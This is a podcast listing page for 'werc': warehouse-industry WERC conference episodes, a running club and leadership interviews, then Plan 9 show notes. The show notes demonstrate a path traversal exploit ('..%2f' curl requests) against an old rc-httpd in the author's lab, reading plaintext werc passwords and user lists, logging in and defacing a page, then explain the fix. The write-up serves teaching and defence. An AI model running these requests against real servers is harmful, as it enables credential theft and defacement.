Podcasts about werc

In this special episode of The New Warehouse Podcast, Kevin chats with Kristi Montgomery, VP of Innovation, Research, and Development at Kenco Logistics, and Mel Alwood, Regional VP of Operations at Neovia Logistics, to preview the upcoming WERC Conference taking place June 8–11, 2025, in New Orleans. Hosted by the Warehouse Education and Research Council (WERC), the conference centers on one powerful theme: Leading with Vision. Kristi and Mel share how this year's focus mirrors the realities of today's warehousing challenges and opportunities, including workforce transformation, AI, peer learning, and networking. Whether you're a first-time attendee or a longtime member, this conversation unpacks why the WERC 2025 Conference remains the go-to educational event for warehouse professionals.Learn more about Zebra Robotics here. Follow us on LinkedIn and YouTube.Support the show

EDINBURG, Texas - Raudel Garza, executive director of Edinburg Economic Development Corporation, says he expects great things from UT-Rio Grande Valley's highly anticipated Workforce Economy Research and Community (WERC) Complex. The complex sits next to I-69 Central in Edinburg. Back in the day it used to be the old Haggar Clothing Company building. Later it became UT-Pan American's Community Engagement and Student Services (CESS) office.The WERC project came about thanks to a $2.4 million grant from the U.S. Economic Development Administration. The EDC grant will fund part of the $8.9 million project, with UTRGV providing an additional $6 million. The remaining $500,000 came from funds secured by U.S. Rep. Monica De La Cruz in this year's appropriations bill for the college.“I think that (the WERC) is going to have a real big impact on business development and small business development in the near future for the entire region,” Garza said, in a recent interview with Ron Whitlock Reports.“They (UTRGV) are consolidating a lot of the business resources that they have now spread out in the (Edinburg) campus and other locations into this one facility.”As the Rio Grande Guardian previously reported, construction has been master-planned and involves completely gutting and transforming the 126,000-square-foot building. “Of that space, approximately 15,000 square feet will be dedicated to classrooms; 10,000 square feet for a manufacturing incubator and commercialization activities; and 10,000 square feet to research and development laboratories specifying in manufacturing and prototyping,” the Guardian reported.“The complex will also include an environmentally controlled dry room, a high security area for government contract work, and office space for the Texas Manufacturing Assistance Center. The goal is to be a one-stop shop for businesses and students to research, design, and manufacture products – from start to finish – for market consumption.”Raudel Garza told Ron Whitlock Reports that UTRGV has “a great support system” to help small businesses and businesses in general.“Ron Garza is going to be setting up quite a few exciting things out there, including, possibly, an incubator for advanced manufacturing, so companies that are (thinking of) coming into the Valley and trying to set up shop can get a lot of assistance from all the different organizations that are within the university, under one roof,” Raudel Garza told Ron Whitlock Reports.“And so I think it's going to be very good for the entire region, and it's great that it's in Edinburg.”Ron Garza (no relation) is UTRGV's associate vice president for workforce and economic development. He is spearheading the project.Ron Garza previously told the Rio Grande Guardian:“What this does that's new and different is it takes all that service that we do and it's also going to add significant square footage for R&D [research and development] laboratories,” said Garza. “We have some on our campuses, but we don't have enough volume specifically for industry. We have a lot of industry partners … They're all asking for the physical space for research commercialization. This will be that space.”Editor's Note: Ron Whitlock secured an interview with Raudel Garza following the recent Edinburg Commercial Tour. The Tour was co-sponsored by Edinburg EDC and the Rio Grande Valley Partnership. Go to www.riograndeguardian.com to read the latest border news stories and watch the latest news videos.

Join WERC leaders Arch Thomason and Will Sparks as they delve into the unique value of WERC membership for warehousing and distribution center professionals including the new team membership offerings and the added value they offer including the new Distribution Logistics Education Program.

"I call them my big dances."Natalie Pertz describes the running adventures - sometimes in the form of races, other times a bit broader than that definition - that she highlights each year on her calendar. The list is nothing short of epic, including the Chicago Marathon, the Javelina Jundred, setting a "Fastest Known Time" on the WO&D trail. (By the way, I did fact check. FastestKnownTime.com has been around longer than Strava.)Natalie is both earnest and funny talking about her running. She describes training for an ultra in the Southwest of the United States in a "suburban lawnmower hat." We discuss our childhood love for capture the flag. We discuss her experience growing up on a farm in Ohio and her first official 5K, the Run for Refugees in New Haven. And we talk about WERC, not to be confused with work. West End Run Club kicked off in 2021, and the Friday morning running, chatting, and coffee drinking crew has been a DC staple ever since. It's so welcoming, that it has grown quite a bit!This episode was recorded in July, but I've been a bit slower with both recording and editing these days. Thank you for your patience - you know life (and another bout of marathon training) keeps you busy! Anyhow, thank you (and happy birthday) to a very kind and speedy community leader, Natalie Pertz!

Send us a Text Message.This episode of the podcast is all about the power of vacuum lifts! Kevin was joined by Bob DeBusk, the North American sales director at PIAB Group at the WERC Conference to discuss their innovative vacuum technology and how it is being used in warehouse operations to make lifting effortless for employees.  Brought to you by Big Joe Forklifts.Support the Show.

Send us a Text Message.In this special episode of the New Warehouse Podcast, hosted by Kevin at the WERC 2024 conference in Dallas, we dive deep into the operations and innovations at Tractor Supply Company with guests Gabby Knoll, Manager of MHE and Automation Engineering, and Will Sparks, Director of Inventory Planning Systems and Analytics. These industry experts shed light on the unique challenges and advancements within the retail supply chain, particularly focusing on material handling, automation, and inventory management. Brought to you by Big Joe Forklifts.Support the Show.

Send us a Text Message.Today, we're diving into a fascinating discussion from the New Warehouse Podcast, recorded live at the WERC 2024 conference in the vibrant city of Dallas, Texas. Kevin sat down with the dynamic Misbah Virani from Rapyuta Robotics, who handles partnerships in North America. Here's a rundown of their engaging conversation on Rapyuta Robotics' foray into the North American market and their innovative automation solutions. Trade in your forklift for a $2,500 rebate here. Follow us on LinkedIn and YouTube.Support the Show.

Send us a Text Message. In a special podcast episode recorded at WERC 2024 in Dallas, Texas, Kevin Lawton of The New Warehouse Podcast sits down with Uma Taylor, the Business Development Manager at Meiborg Inc., a prominent 3PL (Third Party Logistics provider). Uma shares her journey into logistics, details about Meiborg's growth, and provides crucial insights into custom bonded warehousing. This episode was brought to you by Big Joe Forklifts. Learn more here.Support the Show.

Send us a Text Message.This special episode comes to you from this year's WERC Conference. This episode, sponsored by Big Joe Forklifts, dives into the latest trends and technologies in the material handling industry with Kevin being joined by Kurt Spyke, the Director of National Accounts at Big Joe Forklifts, to discuss the state of the industry, innovative solutions, and what lies ahead. Learn more about Big Joe Forklifts right here.Support the Show.

Our guest on this week's episode is Brett Wood, president and CEO of Toyota Material Handing North America. He also serves as the current chair of the Industrial Truck Association. Each year, the forklift industry sets apart a special day, known as National Forklift Safety Day, to recognize the importance of driver training and safe practices when operating industrial trucks. It's sponsored by the Industrial Truck Association. This year, National Forklift Safety Day will be held this coming Tuesday in Washington D.C. We talk with Wood about the event that is planned and how listeners can participate. The Warehousing Education and Research Council (WERC) held  its 47thAnnual Conference in Dallas this week. The event drew about 500 attendees and was chock full of educational sessions  covering technology, labor issues, and case studies about facility and operations improvement projects. There was also update on the major trends and issues shaping the industry, including the release of the annual DC Metrics study.In 2023, Flexport bought the digital technology of bankrupt Convoy, a digital freight matching company. Now we learn how Flexport intends to market that technology to help small carriers in managing their businesses. Supply Chain Xchange  also offers a podcast series called Supply Chain in the Fast Lane.  It is co-produced with the Council of Supply Chain Management Professionals.  Go to your favorite podcast platform to subscribe and to listen to past and future episodes.Articles and resources mentioned in this episode:Industrial Truck Association - National Forklift Safety DayWERC releases 21st annual DC Measures reportFlexport continues to invest in Convoy freight-matching technologyToyota Material Handling to build $100 million factory for electric forkliftsGet episode transcriptsVisit Supply Chain XchangeListen to CSCMP and Supply Chain Xchange's Supply Chain in the Fast Lane podcastSend feedback about this podcast to podcast@agilebme.comPodcast is sponsored by: Equipment DepotOther linksAbout DC VELOCITYSubscribe to DC VELOCITYSign up for our FREE newslettersAdvertise with DC VELOCITYTop 10 Supply Chain Management Podcasts

Curious about the Warehouse Education and Research Council? Then this episode is for you! Kevin is joined by Jeremy Banta, Will Sparks and Melissa Alwood to talk all thing WERC including their upcoming conference June 2nd - 5th. If you want to network, learn from and get involved with other like minded warehouse professionals then this is the organization and conference for you. Find out everything you need to know in this episode and for more information head here. We'll see you in Dallas in June!All Business. No Boundaries.Welcome to All Business. No Boundaries., a collection of supply chain stories by DHL...Listen on: Apple Podcasts SpotifyUtilize our 3PL fulfillment services for all of your logistical needs. Email Kevin directly at kevin@thenewwarehouse.com Free floor tape and floor sign samples from Mighty Line! Get yours here.Follow us on LinkedIn here for more content.Support the show

Welcome to Life in the Leadership Lane where I am talking to leaders making a difference in the workplace and in our communities. How did they get to where they are and what are they doing to stay there! Buckle up and get ready to accelerate in the Leadership Lane! This week, I am talking with Tanya Mariottini, GMS-T, Director of Global Mobility at Twilio, and Board Member for WERC and Move for Hunger. How did Tanya get started in her career? What led her to the world of Mobility and Leadership? What does Tanya share about saying YES to move forward in her career? What does Tanya share about mentors that have inspired her journey? When did Tanya “find her lane” in her career? What does Tanya share about being different leading today than as a 26 year old? What does Tanya share about Leadership? What does Tanya share about WERC? What does Tanya share about Move For Hunger? What does Tanya share about significance? What advice does Tanya share to help us in our every day? …and more as we spend “Time to Accelerate” with a few more questions. Interview resources: Favorite quote(s) from Tanya: “I feel like I am a coach trying to bring out the best in everybody.” “There are two types of people; those that start out in a place of trust and those that need to earn it.” Connect with Tanya on LinkedIn Visit Twilio Learn more about WERC Learn more about Move for Hunger Learn more about the podcast host Bruce Waller Check out Bruce's books Drive With Purpose: Move Your Career from Success to Significance (#1 New Released book on Amazon) Life in the Leadership Lane; Moving Leaders to Inspire and Change the Workplace Find Your Lane; Change your GPS, Change your Career (“Book Authority” Best Books) Milemarkers; A 5 Year Journey …helping you record daily highlights to keep you on track. Subscribe to Bruce's Blog “Move to Inspire” Connect with Bruce on LinkedIn Connect with Bruce on Twitter Connect with Bruce on Instagram Connect with Bruce on Facebook Get relocation support for your next household goods or commercial office move across the US by reaching out to Bruce at bwaller@goarmstrong.com or visit The Armstrong Company

Welcome to Life in the Leadership Lane where I am talking to leaders making a difference in the workplace and in our communities. How did they get to where they are and what are they doing to stay there! Buckle up and get ready to accelerate in the Leadership Lane! How did Ashli get started in her career? What led her to the world of Leadership and Talent Mobility? What does Ashli share about mentors that have inspired her journey? When did Ashli “find her lane” in her career? What lessons does Ashli share about “curiosity”? What does Ashli share about “making mistakes”? What does Ashli share about WERC and what's ahead? What does Ashli share about hiring for Aptitude and Attitude? What “breaking news” does Ashli share on the podcast? What does Ashli share about the defining success”? What advice does Ashli share to help us in our every day? …and more as we spend “Time to Accelerate” with a few more questions. Interview resources: Favorite quote(s) from Ashli: “I'm really proud of my mistakes. If you don't make mistakes, then you're not really trying to grow.” You can teach technical knowledge to anyone that has aptitude and attitude when their heart is in the right place.” Connect with  Ashli on LinkedIn Learn more about WERC Ashli's Book Recommendation Unreasonable Hospitality Check out Bruce's books Life in the Leadership Lane; Moving Leaders to Inspire and Change the Workplace Find Your Lane; Change your GPS, Change your Career (“Book Authority” Best Books) Milemarkers; A 5 Year Journey …helping you record daily highlights to keep you on track. Drive With Purpose: Move Your Career from Success to Significance *COMING February 2024 Subscribe to Bruce's Blog “Move to Inspire” Connect with Bruce on LinkedIn Connect with Bruce on Twitter Connect with Bruce on Instagram Connect with Bruce on Facebook Get relocation support for your next household goods or commercial office move across the US by reaching out to Bruce at bwaller@goarmstrong.com or visit The Armstrong Company

Jim Bierfeldt and Joe Lynch discuss what's inside the shipper mind. Jim is the Founder and President of Logistics Marketing Advisors, a full-service marketing agency exclusively focused on helping logistics businesses drive profitable growth. [podcast src="https://play.libsyn.com/embed/episode/id/28590043/height/192/theme/modern/size/large/thumbnail/yes/custom-color/4c4ca4/time-start/00:00:00/playlist-height/200/direction/backward/download/yes" height="192" width="100%" scrolling="no" class="podcast-class" frameborder="0" placement="top" use_download_link="" download_link_text="" primary_content_url="https://chtbl.com/track/53D5B3/traffic.libsyn.com/thelolpodcast/The_Free_TMS_with_Tim_Higham_mixdown.mp3" theme="custom" custom_color="4C4CA4" libsyn_item_id="28561355" /] About Jim Bierfeldt Jim Bierfeldt is the Founder and President of Logistics Marketing Advisors. Jim has had a 35-year career in marketing and communications, including 25+ within the logistics industry. He ran marketing for a large 3PL before launching his own marketing agency, Logistics Marketing Advisors, which focuses exclusively on providing marketing strategy and services to logistics businesses.  His expertise includes strategic planning, brand positioning, advertising, public relations, website strategy and design, and development of white papers, case studies and other content. Jim has worked with both smaller, regional logistics companies and multi-billion dollar global firms, all of whom benefit from his unique combination of marketing expertise and logistics industry knowledge. Jim holds a Masters Degree in Communications from Fordham University and has been an active in CSCMP, WERC and the IWLA. His hobbies include running (including multiple marathons). About Logistics Marketing Advisors Logistics Marketing Advisors (LMA) is a full-service marketing agency exclusively focused on helping logistics businesses drive profitable growth. Our niche focus gives us the industry understanding and contacts required to market effectively to logistics decision makers. We're a HubSpot-certified, inbound marketing agency with the following specialties: branding and positioning strategy, lead generation, web design and development, content marketing, public relations, and creation of branded and educational content like videos, case studies, white papers and other sales support materials. LMA's approach recognizes that logistics services today are BOUGHT, not sold. Marketing tactics that interrupt and annoy busy logistics executives get ignored. These buyers now have access to a wealth of information and do their own research on how to solve supply chain problems, and what providers can do to help. At LMA, we help logistics businesses get found by prospects during this research phase. Instead of building a marketing engine to solicit, we build an engine that naturally attracts the best prospects. The best way to do that is with helpful, provocative content that leads prospects to conclude, for themselves, that your company has the best solution for their specific challenge. Key Takeaways: Inside the Shipper Mind Jim Bierfeldt is the President of Logistics Marketing Advisors, a full-service marketing agency exclusively focused on helping logistics businesses drive profitable growth. Logistics Marketing Advisors is a boutique marketing and public relations agency specializing in the logistics and transportation industry. They offer a wide range of services, including strategic planning, branding, content creation, social media marketing, public relations, and event management. Their team of experienced professionals has a deep understanding of the logistics industry and the unique challenges and opportunities it faces. They are committed to helping their clients achieve their marketing and business goals through creative and effective solutions. Some of their notable clients include third-party logistics providers, freight forwarders, trucking companies, and technology companies serving the logistics industry. They have been featured in leading industry publications such as Logistics Management, Supply Chain Management Review, and FreightWaves. They are members of the Council of Supply Chain Management Professionals (CSCMP) and the American Marketing Association (AMA). They are passionate about helping their clients succeed and are committed to providing them with the highest level of service and support. Learn More About Inside the Shipper Mind Jim's LinkedIn Logistics Marketing Advisors (LMA) LinkedIn Logistics Marketing Advisors (LMA) 2022 Survey Results: Buyers of Logistics Services Provide Advice on How to Get Their Attention Episode Sponsor: Wreaths Across America Wreaths Across America Radio - Wreaths Across America Episode Sponsor: Lean Solutions Group Outsourced Sales and Marketing with Ryan Mann The Logistics of Logistics Podcast If you enjoy the podcast, please leave a positive review, subscribe, and share it with your friends and colleagues. The Logistics of Logistics Podcast: Google, Apple, Castbox, Spotify, Stitcher, PlayerFM, Tunein, Podbean, Owltail, Libsyn, Overcast Check out The Logistics of Logistics on Youtube

In the latest episode, recorded at the Warehousing Education and Research Council (WERC) Conference 2023, we had the privilege of sitting down with Michael Mikitka, a representative from WERC. As an organization focused on the warehousing industry, WERC plays a crucial role in providing education, research, and support to professionals in this sector. Your first month free of Motion2AI can be found here.Learn more about Resonant Link here. Follow us on LinkedIn here for more content.Support the show

Our guest on this week's episode is Dr. Stefan Heck, CEO and founder of Nauto, a technology company that improves safety for fleet drivers. June is National Safety Month. Drivers on our nation's roads have less than two seconds to react to most situations that can result in an accident, injury, or even death. But there are technologies available that incorporate artificial intelligence to help assure safety on our roadways.  Our guest shares how these new technologies alert commercial drivers to unsafe conditions before they happen.We have seen the rise of manufacturing here in the U.S. as many companies are bringing their production back from Asia to North America.  New research this week reveals how manufacturers are feeling about the current conditions for reshoring. The newest DC Measures study is out. Produced by WERC in conjunction with DC Velocity, the research tracks the latest developments in distribution strategies and operational metrics. This allows companies to benchmark the performance of their warehouses as well as to track industry trends.DC Velocity's sister publication CSCMP's Supply Chain Quarterly  offers a podcast series called Supply Chain in the Fast Lane.  It is co-produced with the Council of Supply Chain Management Professionals.  A new eight-part series on Transportation Tech has launched. Go to your favorite podcast platform to subscribe and to listen to past and future episodes.Articles and resources mentioned in this episode:NautoManufacturing firms complain about interest rates, economic conditions, and the talent shortageWERC releases the 2023 DC Measures reportVisit DCVelocity.com for the latest news Get episode transcriptsVisit Supply Chain QuarterlyListen to CSCMP and Supply Chain Quarterly's Supply Chain in the Fast Lane podcastListen to Supply Chain Quarterly's Top 10 Supply Chain Threats podcastSend feedback about this podcast to podcast@dcvelocity.comPodcast is sponsored by: PERC: The Propane Research CouncilOther linksAbout DC VELOCITYSubscribe to DC VELOCITYSign up for our FREE newslettersAdvertise with DC VELOCITYTop 10 Supply Chain Management Podcasts

Tina from Huntsville calls in WERC to discuss how the Trump indictment is just a distraction to all the other real issues in America right now.

Followup for HPR3675: Installing a Plan 9 CPU server, Plan 9 web server, clarifications on the path traversal bug, private namespaces to the rescue, web application security models Installing Plan 9 with libvirt [root@localhost]# virt-install -n 9pwn --description "pre-patched rc-httpd" --osinfo=unknown --memory=4096 --vcpus=4 --disk path=/var/lib/libvirt/images/9pwn.qcows,bus=virtio,size=10 --graphics spice --cdrom ~/Downloads/9front-8593.acc504c319a4b4188479cfa602e40cb6851c0528.amd64.iso --network bridge=virbr0 [root@localhost]# virt-viewer 9pwn How I find the IP of my guests and add it to my /etc/hosts for faster access. [root@localhost]# virsh domiflist 9pwn Interface Type Source Model MAC ---------------------------------------------------------- vnet3 bridge virbr0 e1000 52:54:00:43:8a:50 [root@localhost]# arp -e | grep 52:54:00:43:8a:50 192.168.122.20 ether 52:54:00:43:8a:50 C virbr0 [root@localhost]# echo cirno 192.168.122.20 >> /etc/hosts Proceed as normal with a 9 installation Set up CPU server with rc-httpd and werc I wrote about configuring a CPU server and also mirrored the notes at my 9front webserver containing a mirror of my plan 9 related things (using self-signed certs but it's fine) I've snarfed+pasted it here for the sake of completeness and modified it slightly so that it's more accessible for other people. I've also revised these notes so that they're less-broken. I may or may not update them. I'm using 9front for this. It has more secure authentication protocols when it comes to remotely connecting. Configuring a CPU server Add users to file server Connect to the file server and add a new user called who is in the groups sys, adm, and upas term% con -C /srv/cwfs.cmd newuser newuser sys + newuser adm + newuser upas + Reboot and set user= when prompted at boot time. Configure user's environment This is similar to cp -r /etc/skel /home/ on a UNIX system. /sys/lib/newuser Configure headless booting Mount the boot partition: term% 9fs 9fat edit the boot config, /n/9fat/plan9.ini bootfile=9pc64 nobootprompt=local!/dev/sdC0/fscache mouseport=ps2 monitor=vesa vgasize=1024x768x14 user= tiltscreen=none service=cpu Add hostowner info to nvram Hostowner is similar to root but not quite. In our configuration, hostowner is close to being equivalent to a root user. The user= line in our bootprompt sets the hostowner. For automatic booting (aka not entering a password at the physical machine every time we power it in), we need to add the hostowner's key to nvram. term% nvram=/dev/sdF0/nvram auth/wrkey bad nvram des key bad authentication id bad authentication domain authid: authdom: cirno secstore key: password: Configure auth server In order to connect to the system over the network, the new user must be added to the auth server. term% auth/keyfs term% auth/changeuser Password: Confirm password: Assign new Inferno/POP secret? [y/n]: n Expiration date (YYYYMMDD or never) [never]: never Post id: User's full name: Department #: User's email address: Sponsor's email address: user installed for Plan 9 Configure permissions /lib/ndb/auth is similar to a /etc/sudoers. This configuration for the new user allows him to execute commands as other users except for the sys and adm users (but sys and adm are more like groups but who cares). append to /lib/ndb/auth hostid= uid=!sys uid=!adm uid=* then reboot Test if it worked with drawterm The 9front version of drawterm must be used as it supports the better crypto in 9front. Other drawterm versions probably won't work. $ /opt/drawterm -u -h example.com -a example.com -r ~/ Configure rc-httpd edit /rc/bin/rc-httpd/select-handler this file is something like /etc/httpd.conf on a UNIX system. #!/bin/rc PATH_INFO=$location switch($SERVER_NAME) { case example.com FS_ROOT=/sys/www/$SERVER_NAME exec static-or-index case * error 503 } To listen on port 80 and run the handler on port 80: cpu% cp /rc/bin/service/!tcp80 /rc/bin/service/tcp80 cpu% chmod +x /rc/bin/rc-httpd/select-handler Reboot and test. SSL I will never give money to the CA racket. Self-signed is the way to go on systems that don't support acme.sh, the only ACME client I use for obtaining free SSL certs. Generate and install: cpu% ramfs -p cpu% cd /tmp cpu% auth/rsagen -t 'service=tls role=client owner=*' > key cpu% chmod 600 key cpu% cp key /sys/lib/tls/key cpu% auth/rsa2x509 'C=US CN=example.com' /sys/lib/tls/key | auth/pemencode CERTIFICATE > /sys/lib/tls/cert cpu% mkdir /cfg/$sysname cpu% echo 'cat /sys/lib/tls/key >> /mnt/factotum/ctl' >> /cfg/$sysname/cpustart Now add a listener in /rc/bin/service/tcp443: #!/bin/rc exec tlssrv -c /sys/lib/tls/cert -l /sys/log/https /rc/bin/service/tcp80 $* And make it executable: cpu% chmod +x /rc/bin/service/tcp443 Install and configure werc cpu% cd cpu% mkdir /sys/www && cd www cpu% hget http://werc.cat-v.org/download/werc-1.5.0.tar.gz > werc-1.5.0.tgz cpu% tar xzf werc-1.5.0.tgz cpu% mv werc-1.5.0 werc # ONLY DO THIS IF YOU *MUST* RUN THE THINGS THAT ALLOW WERC TO WRITE TO DISK # EG. DIRDIR, BLAGH, ETC # DON'T DO THIS, JUST USE DRAWTERM OVER THE NETWORK # HTTP CLIENTS SHOULD NEVER BE ALLOWED TO WRITE TO DISK # PLEASE I BEG YOU cpu% cd .. && for (i in `{du www | awk '{print $2}'}) chmod 777 $i cpu% cd werc/sites/ cpu% mkdir example.com cpu% mv default.cat-v.org example.com now re-edit /rc/bin/rc-httpd/select-handler #!/bin/rc WERC=/sys/www/werc PLAN9=/ PATH_INFO=$location switch($SERVER_NAME){ case cirno FS_ROOT=$WERC/sites/$SERVER_NAME exec static-or-cgi $WERC/bin/werc.rc case * error 503 } Test the website. Werc is fiddly. Werc is archaic. Werc is fun. Path traversal vulnerabilities in old versions of rc-httpd Using release COMMUNITY VS INFRASTRUCTURE, an old release with old rc-httpd, I have done the above steps. In current releases this bug no longer exists. Use current releases. The vulnerability # get list of werc admin users [root@localhost]# curl http://cirno/..%2f..%2f/etc/users/admin/members pwn # get that werc user's password [root@localhost]# http://cirno/..%2f..%2f/etc/users/pwn/password supersecret Wait, the passwords for werc are stored in plain text? Let's log in [root@localhost]# firefox http://cirno/_users/login Now let's see if any of the werc users are also system users: # let's enumerate users [root@localhost]# curl http://cirno/..%2f..%2f..%2f..%2f..%2f..%2f/adm/users -1:adm:adm:glenda,pwn 0:none:: 1:tor:tor: 2:glenda:glenda: 3:pwn:pwn: 10000:sys::glenda,pwn 10001:map:map: 10002:doc:: 10003:upas:upas:glenda,pwn 10004:font:: 10005:bootes:bootes: Let's hope that no one is re-using credentials. Let's check just to be sure $ PASS=supersecret /opt/drawterm -u pwn -h cirno -a cirno -G cpu% cat /env/sysname cirno cpu% This is what happens when you have path traversal vulnerabilities, an authentication vulnerability in your CMS, and share login/passwords How the static-or-cgi handler works rc-httpd calls various handler scripts that decide what to do with requests. In the example configuration for werc, rc-httpd is instructed to call the static-or-cgi script. I will compile these archaic rc scripts into pseudo code for the listener. The static-or-cgi handler (the handler specified in the httpd config) is simple: #!/bin/rc cgiargs=$* fn error{ if(~ $1 404) exec cgi $cgiargs if not $rc_httpd_dir/handlers/error $1 } if(~ $location */) exec cgi $cgiargs if not exec serve-static If the requested file exists, call the cgi handler and pass it arguments. If the requested file does not exist, call the serve-static handler. How the serve-static handler works The problem lies in the serve-static handler: #!/bin/rc full_path=`{echo $"FS_ROOT^$"PATH_INFO | urlencode -d} full_path=$"full_path if(~ $full_path */) error 503 if(test -d $full_path){ redirect perm $"location^'/' 'URL not quite right, and browser did not accept redirect.' exit } if(! test -e $full_path){ error 404 exit } if(! test -r $full_path){ error 503 exit } do_log 200 switch($full_path){ case *.html *.htm type=text/html case *.css type=text/css case *.txt *.md type=text/plain case *.jpg *.jpeg type=image/jpeg case *.gif type=image/gif case *.png type=image/png case * type=`{file -m $full_path} } if(~ $type text/*) type=$type^'; charset=utf-8' max_age=3600 # 1 hour echo 'HTTP/1.1 200 OK'^$cr emit_extra_headers echo 'Content-type: '^$type^$cr echo 'Content-length: '^`{ls -l $full_path | awk '{print $6}'}^$cr echo 'Cache-control: max-age='^$max_age^$cr echo $cr exec cat $full_path encode the full file path into a url if the url points to a file outside of '*/', the document root, error 503 if the url is broken, exit if the url points to a file that neither exists nor is readable, error 503 if you haven't exited by now, serve the file The problem is no sanitization. The script checks for files in the current directory BUT NOT BEFORE ENCODING THE URL STRING. The urlencode command works by decoding encoded characters. cpu% echo 'http://cirno/..%2f' | urlencode -d http://cirno/../ Does ../ exist in */ ? the answer is yes. .. is a directory contained inside of */ */../ is the current working directory. How they fixed it Adding a sanitizer. By comparing the encoded url against an actual hypothetical file path and exiting if there is a mismatch, all %2f funny business is avoided. Other (optional) bad config options in werc rc-httpd aside, a bad werc config can still lead to website defacement if your non rc-httpd webserver has a path traversal vulnerability. Additionally I have modified the DAC for /sys/www to allow werc, a child process of rc-httpd to write to disk. rc-httpd runs as the none user so it's not typically allowed to write to disk unless explicitly permitted. I do not allow this on my 9 webserver because it's the worst idea in the history of all time ever. I enabled the dirdir and blagh modules as if I were the type of admin who does a chmod -R 777 /var/www/htdocs because that's what the wordpress installation guide told me to do so I could have a cool and easy way to modify my website from the browser. Let's pretend that I'm not the admin of this system and scrape the werc config just to see if the hypothetical badmin has these modules enabled. # get config [root@localhost]# curl http://cirno/..%2f..%2f/sites/cirno/_werc/config masterSite=cirno siteTitle='Werc Test Suite' conf_enable_wiki wiki_editor_groups admin Hmmm, looks like these modules are enabled so we can assume that httpd is allowed to write to disk. Let's modify cirno/index.md to warn the admin. As a funny joke. Totally not a crime under the Computer Fraud and Abuse Act. Totally not an inappropriate way to warn admins about a vulnerability. [root@localhost]# curl -s cirno | pandoc --from html --to plain quotes | docs | repo | golang | sam | man | acme | Glenda | 9times | harmful | 9P | cat-v.org Related sites: | site updates | site map | Werc Test Suite - › apps/ - › titles/ SECURITY ADVISORY: lol this guy still hasn't figured out the ..%2f trick Powered by werc Modifying werc to support password hashing Adding password hashes isn't too difficult. Being constrained by time, I have not done this quite yet. Reading the source code, all it takes is modifying 2 werc scripts: bin/werclib.rc and bin/aux/addwuser.rc % echo 'supersecret' | sha1sum -2 512 Private namespaces to the rescue Luckily enough, the webserver runs as the none user with it's own namespace. Comparing the hostowner's namespace and none user's namespace I grab the namespace from the system console (ie not from drawterm) and from the listen command, then run a diff (unix style) to show the differences. cpu% ns | sort > cpu.ns cpu% ps -a | grep -e 'listen.*80' | grep -v grep none 355 0:00 0:00 132K Open listen [/net/tcp/2 tcp!*!80] cpu% ns 355 | sort > listen.ns cpu% diff -u listen.ns cpu.ns --- listen.ns +++ cpu.ns @@ -6,17 +6,29 @@ bind /amd64/bin /bin bind /mnt /mnt bind /mnt/exportfs /mnt/exportfs +bind /mnt/temp/factotum /mnt/factotum bind /n /n bind /net /net bind /root /root +bind -a '#$' /dev bind -a '#I' /net +bind -a '#P' /dev +bind -a '#S' /dev bind -a '#l' /net +bind -a '#r' /dev +bind -a '#t' /dev +bind -a '#u' /dev +bind -a '#u' /dev bind -a '#¤' /dev bind -a '#¶' /dev +bind -a '#σ/usb' /dev +bind -a '#σ/usbnet' /net bind -a /rc/bin /bin bind -a /root / +bind -b '#k' /dev bind -c '#e' /env bind -c '#s' /srv +bind -c /usr/pwn/tmp /tmp cd /usr/pwn mount -C '#s/boot' /n/other other mount -a '#s/boot' / @@ -26,4 +38,4 @@ mount -a '#s/slashmnt' /mnt mount -a '#s/slashn' /n mount -aC '#s/boot' /root -mount -b '#s/factotum' /mnt +mount -b '#s/cons' /dev The major difference is that the hostowner (equivalent to root user) has a lot more things bound to his namespace: '#$' PCI interfaces '#P' APM power management '#S' storage devices '#r' realtime clock and nvram '#t' serial ports '#u' USB '#σ' /shr global mountpoints '#k' keyboard /tmp directories '#s' various special files relating to services The listen process in question is fairly well isolated from the system. Minimal system damage can be caused by pwning a process owned by none. Closing An argument could be maid that the rc-httpd vulnerability was "not a bug" because "namespaces are supposed to segregate the system". I disagree on this point. Namespaces are good and all but security is a multi-layer thing. Relying on a single security feature to save your system means relying on a single point of failure. Chroot escapes, namespace escapes, container escapes, and VM escapes are all things we need to be thinking about when writing software that touches the internet. Although unlikely, getting pwnd in spite of these security methods is still possible; all user input is dangerous and all user input that becomes remote code execution always results in privilege escalation no matter how secure you think your operating system is. Each additional layer of security makes it harder for attackers to get into the system. For example, when I write PHP applications, I consider things in this order: don't pass unnecessary resources into the document root via symlinks, bind mounts, etc. never ever use system() in a context where user input can ever be passed to the function in order to avoid shell escapes sanitize all user input depending on context. Ex: if the PHP program is directly referencing files, make a whitelist and compare requests to this whitelist. If the PHP process is writing to a database, use prepared statements. fire up a kali linux vm and beat the test server half to death iterate upon my ignorance doubly verify DAC just to be sure re-check daemon configs to make sure I'm not doing anything stupid FINALLY: rely on SELinux or OpenBSD chroots (depending on prod env) to save me if all else failed And of course the other things like firewalls (with whitelists for ports and blacklists for entire IP address blocks), key based ssh authentication, sshd configurations that don't make it possible to enumerate users, rate limiters, etc. Each layer of security is like a filter. If you have enough layers of filters it would take an unrealistic amount of force to push water through this filter. Although no system is perfectly safe from three letter agencies, a system with multiple layers of security is typically safe from drive-by attacks. Final exercise: intentionally write a php script that does path traversal. Run this on a system with SELinux. Try to coax /etc/passwd out of the server. Now try php-fpm instead of mod_php or vice-versa. You'll be surprised when even MAC doesn't protect your system. Even now, after spending almost a month and a half worth of after work hacker hours almost exclusively on 9, I enjoy it more than when I began and even more than when using it in semi-regular spurts in years past. The purpose of research operating systems is to perform research, be it about the design of the system otherwise. Where would we be without private namespaces? How can I use this idea in the real world? What would the world look like if we had real distributed computing instead of web browsers (which are the new dumb terminal)? Is there a use case for this in the real world? What can we learn from single layer security models? What can we do to improve the system? Plan 9 is perfect for this type of research. I'm considering writing an httpd in C and a werc-like (minus the parts I don't like) in C and modifying the namespace for the listener so that I can run a webserver on 9 without pulling in /bin in order to reduce the possibility of a shell escape. I think that in order to improve ourselves, we must be critical of ourselves. We must be critical of the things we enjoy in order to improve them and learn something new in the process. For software especially, there is no such thing as perfection, only least bad. And my final thought: Criticism: This program/OS/whatever sucks Response: I know, help me fix it.

